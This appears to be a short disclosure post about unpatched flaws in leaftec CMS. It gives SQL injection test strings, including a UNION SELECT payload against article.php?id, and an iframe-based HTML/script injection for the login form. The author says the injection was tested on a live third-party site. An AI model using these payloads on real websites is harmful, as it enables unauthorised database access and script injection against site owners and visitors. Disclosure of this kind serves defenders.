leaftec cms is a small CMS being developed by a German individual / German company. Sadly the CMS is not available for free download, so I stumbled across the vulnerabilities while I was visiting a website which was based on the leaftec cms. I contacted the vendor bud sadly my contact attempts were ignored and the vulnerabilities [...]
Author: valentin
leaftec cms is a small CMS being developed by a German individual / German company. Sadly the CMS is not available for free download, so I stumbled across the vulnerabilities while I was visiting a website which was based on the leaftec cms.
I contacted the vendor bud sadly my contact attempts were ignored and the vulnerabilities are still present today.
#1 SQL Injection
Vulnerable URL:
http://www.some-cool-domain.tld/article.php?id=XX
Examples for testing and injecting SQL stuff:
http://www.some-cool-domain.tld/article.php?id=’
http://www.some-cool-domain.tld/article.php?id=”
http://www.some-cool-domain.tld/article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version()),7–
(Tested on a live website using leaftec cms.)
#2 XSS / HTML Code Injection
Several parts of the CMS allow HTML and Java Script code injection, e.g. the login box.
After submitting the form the cms puts a red border around the login and password field but
also implements the injected code into the website.
Example for HTML code:
“><iframe src=http://www.google.de></iframe>
Comments on this entry (1 comment)
Did you like this post? You can share your opinion with us! Simply click here.